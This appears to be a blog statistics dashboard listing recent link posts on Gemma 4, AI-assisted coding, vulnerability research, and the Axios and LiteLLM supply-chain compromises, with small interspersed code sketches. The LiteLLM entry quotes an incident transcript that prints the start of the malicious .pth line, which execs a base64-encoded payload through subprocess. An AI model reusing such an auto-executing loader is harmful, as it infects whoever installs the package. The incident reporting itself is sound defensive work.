Example dashboard

Various statistics from my blog.

Owned by simonw, visibility: Public

Entries

3288

SQL query
select 'Entries' as label, count(*) as big_number from blog_entry

Blogmarks

8334

SQL query
select 'Blogmarks' as label, count(*) as big_number from blog_blogmark

Quotations

1369

SQL query
select 'Quotations' as label, count(*) as big_number from blog_quotation

Chart of number of entries per month over time

SQL query
select '<h2>Chart of number of entries per month over time</h2>' as html
SQL query
select to_char(date_trunc('month', created), 'YYYY-MM') as bar_label,
count(*) as bar_quantity from blog_entry group by bar_label order by bar_label
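The chart query is written for Postgres (`date_trunc`/`to_char`). For anyone reproducing this rollup against a SQLite copy of the data, here is a hedged sketch of the same per-month aggregation using `strftime` — the `blog_entry` table name and `bar_label`/`bar_quantity` aliases mirror the query above, while the sample rows are invented for illustration:

```python
# Hedged sketch: SQLite equivalent of the Postgres per-month rollup.
# Table name and column aliases mirror the dashboard query; the sample
# created timestamps are made up purely for demonstration.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("create table blog_entry (created text)")
conn.executemany(
    "insert into blog_entry values (?)",
    [("2026-04-01 10:00:00",), ("2026-04-15 12:00:00",), ("2026-03-02 09:30:00",)],
)
rows = conn.execute(
    "select strftime('%Y-%m', created) as bar_label,"
    "       count(*) as bar_quantity"
    " from blog_entry group by bar_label order by bar_label"
).fetchall()
print(rows)  # [('2026-03', 1), ('2026-04', 2)]
```

Ordering by `bar_label` keeps the bars chronological, which is usually what a "per month over time" chart wants.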

Ten most recent blogmarks (of 8334 total)

SQL query
select '## Ten most recent blogmarks (of ' || count(*) || ' total)' as markdown from blog_blogmark
SQL query
select link_title, link_url, commentary, created from blog_blogmark order by created desc limit 10

10 rows

link_title link_url commentary created
Google AI Edge Gallery https://apps.apple.com/nl/app/google-ai-edge-gallery/id6749645337 Terrible name, really great app: this is Google's official app for running their Gemma 4 models (the E2B and E4B sizes, plus some members of the Gemma 3 family) directly on your iPhone. It works *really* well. The E2B model is a 2.54GB download and is both fast and genuinely useful. The app also provides "ask questions about images" and audio transcription (up to 30s) with the two small Gemma 4 models, and has an interesting "skills" demo which demonstrates tool calling against eight different interactive widgets, each implemented as an HTML page (though sadly the source code is not visible): interactive-map, kitchen-adventure, calculate-hash, text-spinner, mood-tracker, mnemonic-password, query-wikipedia, and qr-code. <img src="https://static.simonwillison.net/static/2026/gemini-agent-skills.jpg" alt="Screenshot of an &quot;Agent Skills&quot; chat interface using the Gemma-4-E2B-it model. The user prompt reads &quot;Show me the Castro Theatre on a map.&quot; The model response, labeled &quot;Model on GPU,&quot; shows it &quot;Called JS skill &#39;interactive-map/index.html&#39;&quot; and displays an embedded Google Map centered on a red pin at The Castro Theatre in San Francisco, with nearby landmarks visible including Starbelly, Cliff&#39;s Variety, Blind Butcher, GLBT Historical Society Museum, and Fable. An &quot;Open in Maps&quot; link and &quot;View in full screen&quot; button are shown. Below the map, the model states &quot;The interactive map view for the Castro Theatre has been shown.&quot; with a response time of 2.4 s. A text input field with &quot;Type prompt...&quot; placeholder, a &quot;+&quot; button, and a &quot;Skills&quot; button appear at the bottom." style="max-width: min(400px, 100%); margin: 0 auto; display: block;"> (That demo did freeze the app when I tried to add a follow-up prompt though.) 
This is the first time I've seen a local model vendor release an official app for trying out their models on an iPhone. Sadly it's missing permanent logs - conversations with this app are ephemeral. 2026-04-06 05:18:26+00:00
Eight years of wanting, three months of building with AI https://lalitm.com/post/building-syntaqlite-ai/ Lalit Maganti provides one of my favorite pieces of long-form writing on agentic engineering I've seen in ages. They spent eight years thinking about and then three months building [syntaqlite](https://github.com/lalitMaganti/syntaqlite), which they describe as "[high-fidelity devtools that SQLite deserves](https://lalitm.com/post/syntaqlite/)". The goal was to provide fast, robust and comprehensive linting and verifying tools for SQLite, suitable for use in language servers and other development tools - a parser, formatter, and verifier for SQLite queries. I've found myself wanting this kind of thing in the past myself, hence my (far less production-ready) [sqlite-ast](https://simonwillison.net/2026/Jan/30/sqlite-ast-2/) project from a few months ago. Lalit had been procrastinating on this project for years, because of the inevitable tedium of needing to work through 400+ grammar rules to help build a parser. That's exactly the kind of tedious work that coding agents excel at! Claude Code helped get over that initial hump and build the first prototype: > AI basically let me put aside all my doubts on technical calls, my uncertainty of building the right thing and my reluctance to get started by giving me very concrete problems to work on. Instead of “I need to understand how SQLite’s parsing works”, it was “I need to get AI to suggest an approach for me so I can tear it up and build something better". I work so much better with concrete prototypes to play with and code to look at than endlessly thinking about designs in my head, and AI lets me get to that point at a pace I could not have dreamed about before. Once I took the first step, every step after that was so much easier. That first vibe-coded prototype worked great as a proof of concept, but they eventually made the decision to throw it away and start again from scratch. 
AI worked great for the low level details but did not produce a coherent high-level architecture: > I found that AI made me procrastinate on key design decisions. Because refactoring was cheap, I could always say “I’ll deal with this later.” And because AI could refactor at the same industrial scale it generated code, the cost of deferring felt low. But it wasn’t: deferring decisions corroded my ability to think clearly because the codebase stayed confusing in the meantime. The second attempt took a lot longer and involved a great deal more human-in-the-loop decision making, but the result is a robust library that can stand the test of time. It's worth setting aside some time to read this whole thing - it's full of non-obvious downsides to working heavily with AI, as well as a detailed explanation of how they overcame those hurdles. The key idea I took away from this concerns AI's weakness in terms of design and architecture: > When I was working on something where I didn’t even know what I wanted, AI was somewhere between unhelpful and harmful. The architecture of the project was the clearest case: I spent weeks in the early days following AI down dead ends, exploring designs that felt productive in the moment but collapsed under scrutiny. In hindsight, I have to wonder if it would have been faster just thinking it through without AI in the loop at all. > > But expertise alone isn’t enough. Even when I understood a problem deeply, AI still struggled if the task had no objectively checkable answer. Implementation has a right answer, at least at a local level: the code compiles, the tests pass, the output matches what you asked for. Design doesn’t. We’re still arguing about OOP decades after it first took off. 2026-04-05 23:54:18+00:00
A visual guide to Gemma 4 https://newsletter.maartengrootendorst.com/p/a-visual-guide-to-gemma-4 Maarten Grootendorst joined Google DeepMind two months ago and has been working on the Gemma 4 release. 2026-04-04 16:08:19+00:00
Vulnerability Research Is Cooked https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked/ Thomas Ptacek's take on the sudden and enormous impact the latest frontier models are having on the field of vulnerability research. > Within the next few months, coding agents will drastically alter both the practice and the economics of exploit development. Frontier model improvement won’t be a slow burn, but rather a step function. Substantial amounts of high-impact vulnerability research (maybe even most of it) will happen simply by pointing an agent at a source tree and typing “find me zero days”. Why are agents so good at this? A combination of baked-in knowledge, pattern matching ability and brute force: > You can't design a better problem for an LLM agent than exploitation research. > > Before you feed it a single token of context, a frontier LLM already encodes supernatural amounts of correlation across vast bodies of source code. Is the Linux KVM hypervisor connected to the `hrtimer` subsystem, `workqueue`, or `perf_event`? The model knows. > > Also baked into those model weights: the complete library of documented "bug classes" on which all exploit development builds: stale pointers, integer mishandling, type confusion, allocator grooming, and all the known ways of promoting a wild write to a controlled 64-bit read/write in Firefox. > > Vulnerabilities are found by pattern-matching bug classes and constraint-solving for reachability and exploitability. Precisely the implicit search problems that LLMs are most gifted at solving. Exploit outcomes are straightforwardly testable success/failure trials. An agent never gets bored and will search forever if you tell it to. The article was partly inspired by [this episode of the Security Cryptography Whatever podcast](https://securitycryptographywhatever.com/2026/03/25/ai-bug-finding/), where David Adrian, Deirdre Connolly, and Thomas interviewed Anthropic's Nicholas Carlini for 1 hour 16 minutes. 
I just started a new tag here for [ai-security-research](https://simonwillison.net/tags/ai-security-research/) - it's up to 11 posts already. 2026-04-03 23:59:08+00:00
Gemma 4: Byte for byte, the most capable open models https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4/ Four new vision-capable Apache 2.0 licensed reasoning LLMs from Google DeepMind, sized at 2B, 4B, 31B, plus a 26B-A4B Mixture-of-Experts. Google emphasize "unprecedented level of intelligence-per-parameter", providing yet more evidence that creating small useful models is one of the hottest areas of research right now. They actually label the two smaller models as E2B and E4B for "Effective" parameter size. The system card explains: > The smaller models incorporate Per-Layer Embeddings (PLE) to maximize parameter efficiency in on-device deployments. Rather than adding more layers or parameters to the model, PLE gives each decoder layer its own small embedding for every token. These embedding tables are large but are only used for quick lookups, which is why the effective parameter count is much smaller than the total. I don't entirely understand that, but apparently that's what the "E" in E2B means! One particularly exciting feature of these models is that they are multi-modal beyond just images: > **Vision and audio**: All models natively process video and images, supporting variable resolutions, and excelling at visual tasks like OCR and chart understanding. Additionally, the E2B and E4B models feature native audio input for speech recognition and understanding. I've not figured out a way to run audio input locally - I don't think that feature is in LM Studio or Ollama yet. I tried them out using the GGUFs for [LM Studio](https://lmstudio.ai/models/gemma-4). The 2B (4.41GB), 4B (6.33GB) and 26B-A4B (17.99GB) models all worked perfectly, but the 31B (19.89GB) model was broken and spat out `"---\n"` in a loop for every prompt I tried. 
The succession of [pelican quality](https://gist.github.com/simonw/12ae4711288637a722fd6bd4b4b56bdb) from 2B to 4B to 26B-A4B is notable: E2B: ![Two blue circles on a brown rectangle and a weird mess of orange blob and yellow triangle for the pelican](https://static.simonwillison.net/static/2026/gemma-4-2b-pelican.png) E4B: ![Two black wheels joined by a sort of grey surfboard, the pelican is semicircles and a blue blob floating above it](https://static.simonwillison.net/static/2026/gemma-4-4b-pelican.png) 26B-A4B: ![Bicycle has the right pieces although the frame is wonky. Pelican is genuinely good, has a big triangle beak and a nice curved neck and is clearly a bird that is sitting on the bicycle](https://static.simonwillison.net/static/2026/gemma-4-26b-pelican.png) (This one actually had an SVG error - "error on line 18 at column 88: Attribute x1 redefined" - but after [fixing that](https://gist.github.com/simonw/12ae4711288637a722fd6bd4b4b56bdb?permalink_comment_id=6074105#gistcomment-6074105) I got probably the best pelican I've seen yet from a model that runs on my laptop.) Google are providing API access to the two larger Gemma models via their [AI Studio](https://aistudio.google.com/prompts/new_chat?model=gemma-4-31b-it). I added support to [llm-gemini](https://github.com/simonw/llm-gemini) and then [ran a pelican](https://gist.github.com/simonw/f9f9e9c34c7cc0ef5325a2876413e51e) through the 31B model using that: llm -m gemini/gemma-4-31b-it 'Generate an SVG of a pelican riding a bicycle' Pretty good, though it is missing the front part of the bicycle frame: ![Motion blur lines, a mostly great bicycle albeit missing the front part of the frame. Pelican is decent. ](https://static.simonwillison.net/static/2026/gemma-4-31b-pelican.png) 2026-04-02 18:28:54+00:00
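The Per-Layer Embeddings passage in the Gemma 4 entry above lends itself to a back-of-envelope illustration. This is purely my own toy arithmetic (every number below is invented, not Gemma 4's real configuration), showing how large lookup-only tables can inflate the total parameter count while leaving the per-token "effective" count much smaller:

```python
# Toy arithmetic only -- invented numbers, not Gemma 4's configuration.
# PLE gives each decoder layer its own small embedding table per token;
# the tables are big, but each token only *looks up* one row per layer,
# so the parameters doing dense compute per token stay much smaller.
vocab_size = 256_000          # hypothetical vocabulary size
ple_dim = 256                 # hypothetical per-layer embedding width
n_layers = 30                 # hypothetical decoder depth
dense_params = 2_000_000_000  # hypothetical "effective" compute params

ple_params = vocab_size * ple_dim * n_layers  # lookup-only parameters
total_params = dense_params + ple_params

print(f"total: {total_params:,}  effective: {dense_params:,}")
```

Under these made-up numbers the lookup tables nearly double the total parameter count without adding to the per-token compute, which is at least consistent with the system card's claim that the effective count is "much smaller than the total".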
Announcing 1-bit Bonsai https://prismml.com/news/bonsai-8b PrismML is a newly out-of-stealth AI lab with [a focus](https://prismml.com/about) on researching "can we massively multiply intelligence in models without increasing their size or complexity?". Their first model release is a model called Bonsai, and it's very small indeed: it comes in 1.7B, 4B and 8B parameter sizes but uses 1 bit parameters. Here are the sizes of the resulting models on Hugging Face: <center><table> <thead> <tr> <th>Model</th> <th>Size</th> </tr> </thead> <tbody> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-8B-mlx-1bit">Bonsai-8B-mlx-1bit</a></td> <td>1.3 GB</td> </tr> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-8B-gguf">Bonsai-8B-gguf</a></td> <td>1.16 GB</td> </tr> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-4B-gguf">Bonsai-4B-gguf</a></td> <td>572 MB</td> </tr> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-4B-mlx-1bit">Bonsai-4B-mlx-1bit</a></td> <td>645 MB</td> </tr> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-1.7B-gguf">Bonsai-1.7B-gguf</a></td> <td>248 MB</td> </tr> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-1.7B-mlx-1bit">Bonsai-1.7B-mlx-1bit</a></td> <td>285 MB</td> </tr> </tbody> </table></center> 2026-04-01 20:20:04+00:00
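The file sizes in the Bonsai table above line up with the 1-bit claim: 8 billion parameters at one bit each is roughly 1 GB before metadata and embeddings, close to the listed 1.16-1.3 GB. A minimal sketch (entirely my own, nothing to do with PrismML's actual on-disk format) of packing one sign bit per weight, eight weights to a byte:

```python
# My own toy packing scheme, not PrismML's format: one sign bit per
# weight, eight weights per byte, so 8B parameters need roughly 1 GB.
def pack_signs(weights):
    out, bits = bytearray(), 0
    for i, w in enumerate(weights):
        if w >= 0:
            bits |= 1 << (i % 8)  # set this weight's bit
        if i % 8 == 7:            # byte is full: flush it
            out.append(bits)
            bits = 0
    if len(weights) % 8:          # flush any trailing partial byte
        out.append(bits)
    return bytes(out)

packed = pack_signs([0.3, -0.1, 0.7, -0.9, 0.2, 0.5, -0.4, 0.8])
print(len(packed))  # 1 byte for 8 weights
```

Real 1-bit formats are more involved (scaling factors, mixed-precision layers), but the eight-to-one compression is where the headline sizes come from.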
Supply Chain Attack on Axios Pulls Malicious Dependency from npm https://socket.dev/blog/axios-npm-package-compromised Useful writeup of today's supply chain attack against Axios, the HTTP client NPM package with [101 million weekly downloads](https://www.npmjs.com/package/axios). Versions `1.14.1` and `0.30.4` both included a new dependency called `plain-crypto-js` which was freshly published malware, stealing credentials and installing a remote access trojan (RAT). It looks like the attack came from a leaked long-lived npm token. Axios have [an open issue to adopt trusted publishing](https://github.com/axios/axios/issues/7055), which would ensure that only their GitHub Actions workflows are able to publish to npm. The malware packages were published without an accompanying GitHub release, which strikes me as a useful heuristic for spotting potentially malicious releases - the same pattern was present for LiteLLM [last week](https://simonwillison.net/2026/Mar/24/malicious-litellm/) as well. 2026-03-31 23:28:40+00:00
Pretext https://github.com/chenglou/pretext Exciting new browser library from Cheng Lou, previously a React core developer and the original creator of the [react-motion](https://github.com/chenglou/react-motion) animation library. Pretext solves the problem of calculating the height of a paragraph of line-wrapped text *without touching the DOM*. The usual way of doing this is to render the text and measure its dimensions, but this is extremely expensive. Pretext uses an array of clever tricks to make this much, much faster, which enables all sorts of new text rendering effects in browser applications. Here's [one demo](https://chenglou.me/pretext/dynamic-layout/) that shows the kind of things this makes possible: <video autoplay loop muted playsinline poster="https://static.simonwillison.net/static/2026/pretex.jpg"> <source src="https://static.simonwillison.net/static/2026/pretex.mp4" type="video/mp4"> </video> The key to how this works is the way it separates calculations into a call to a `prepare()` function followed by multiple calls to `layout()`. The `prepare()` function splits the input text into segments (effectively words, but it can take things like soft hyphens and non-latin character sequences and emoji into account as well) and measures those using an off-screen canvas, then caches the results. This is comparatively expensive but only runs once. The `layout()` function can then emulate the word-wrapping logic in browsers to figure out how many wrapped lines the text will occupy at a specified width and measure the overall height. I [had Claude](https://claude.ai/share/7859cbe1-1350-4341-bb40-6aa241d6a1fe) build me [this interactive artifact](https://tools.simonwillison.net/pretext-explainer) to help me visually understand what's going on, based on a simplified version of Pretext itself. The way this is tested is particularly impressive. 
The earlier tests [rendered a full copy of the Great Gatsby](https://github.com/chenglou/pretext/commit/d07dd7a5008726f99a15cebe0abd9031022e28ef#diff-835c37ed3b9234ed4d90c7703addb8e47f4fee6d9a28481314afd15ac472f8d2) in multiple browsers to confirm that the estimated measurements were correct against a large volume of text. This was later joined by [the corpora/ folder](https://github.com/chenglou/pretext/tree/main/corpora) using the same technique against lengthy public domain documents in Thai, Chinese, Korean, Japanese, Arabic, and more. Cheng Lou [says](https://twitter.com/_chenglou/status/2037715226838343871): > The engine’s tiny (few kbs), aware of browser quirks, supports all the languages you’ll need, including Korean mixed with RTL Arabic and platform-specific emojis > > This was achieved through showing Claude Code and Codex the browsers ground truth, and have them measure & iterate against those at every significant container width, running over weeks 2026-03-29 20:08:45+00:00
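The `prepare()`/`layout()` split in the Pretext entry above can be sketched in a few lines. This is my own drastically simplified Python illustration, not Pretext's code: real Pretext measures segments on an off-screen canvas and handles soft hyphens, emoji, and non-latin scripts, whereas here measurement is faked with a fixed per-character width:

```python
# Simplified illustration of the prepare()/layout() split, not Pretext
# itself: prepare() measures each segment once and caches the widths;
# layout() then emulates greedy word-wrapping to count lines without
# touching any DOM. Glyph widths are faked with a constant.
CHAR_W = 7.0  # hypothetical average glyph width in px

def prepare(text):
    """Split into word segments and cache a width per segment (runs once)."""
    return [(seg, len(seg) * CHAR_W) for seg in text.split()]

def layout(prepared, container_width, space_w=CHAR_W, line_height=20.0):
    """Greedy word wrap over cached widths; returns (line_count, height)."""
    lines, line_w = 1, 0.0
    for _, w in prepared:
        candidate = w if line_w == 0 else line_w + space_w + w
        if candidate > container_width and line_w > 0:
            lines += 1      # wrap: start a new line with this segment
            line_w = w
        else:
            line_w = candidate
    return lines, lines * line_height

prep = prepare("the quick brown fox jumps over the lazy dog")
print(layout(prep, 120))  # (3, 60.0)
```

The expensive step (measurement) runs once in `prepare()`; `layout()` can then be called repeatedly at different container widths, which is what makes per-frame relayout cheap.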
We Rewrote JSONata with AI in a Day, Saved $500K/Year https://www.reco.ai/blog/we-rewrote-jsonata-with-ai Bit of a hyperbolic framing but this looks like another case study of **vibe porting**, this time spinning up a new custom Go implementation of the [JSONata](https://jsonata.org) JSON expression language - similar in focus to jq, and heavily associated with the [Node-RED](https://nodered.org) platform. As with other vibe-porting projects the key enabling factor was JSONata's existing test suite, which helped build the first working Go version in 7 hours and $400 of token spend. The Reco team then used a shadow deployment for a week to run the new and old versions in parallel to confirm the new implementation exactly matched the behavior of the old one. 2026-03-27 00:35:01+00:00
My minute-by-minute response to the LiteLLM malware attack https://futuresearch.ai/blog/litellm-attack-transcript/ Callum McMahon reported the [LiteLLM malware attack](https://simonwillison.net/2026/Mar/24/malicious-litellm/) to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container: > **Confirmed**. Fresh download from PyPI right now in an isolated Docker container: > > Inspecting: litellm-1.82.8-py3-none-any.whl > FOUND: litellm_init.pth > SIZE: 34628 bytes > FIRST 200 CHARS: > import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl... > > The malicious `litellm==1.82.8` is **live on PyPI right now** and anyone installing or upgrading litellm will be infected. This needs to be reported to security@pypi.org immediately. I was chuffed to see Callum use my [claude-code-transcripts](https://github.com/simonw/claude-code-transcripts) tool to publish the transcript of the conversation. 2026-03-26 23:58:22+00:00
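The smoking gun in the transcript above is an unexpected `.pth` file inside the wheel - `.pth` files in `site-packages` can execute arbitrary code at interpreter startup. A hedged sketch (my own, not Callum's tooling) of checking a wheel you already have on disk for planted `.pth` entries; the fake wheel contents here are invented for the demo:

```python
# My own sketch of the check described above: a wheel is just a zip, so
# list its entries and flag any .pth files, which run code at startup.
import io
import zipfile

def suspicious_pth_files(wheel_file):
    """Return the names of any .pth entries inside a wheel (path or file-like)."""
    with zipfile.ZipFile(wheel_file) as wheel:
        return [name for name in wheel.namelist() if name.endswith(".pth")]

# Demo against an in-memory fake wheel with a planted .pth (invented names):
fake = io.BytesIO()
with zipfile.ZipFile(fake, "w") as zf:
    zf.writestr("example_pkg/__init__.py", "")
    zf.writestr("example_init.pth", "import os, subprocess, sys  # payload here")

found = suspicious_pth_files(fake)
print(found)  # ['example_init.pth']
```

Legitimate packages do occasionally ship `.pth` files, so a hit is a prompt for inspection rather than proof of compromise - but a brand-new `.pth` appearing in a patch release, as with litellm, is exactly the pattern worth catching.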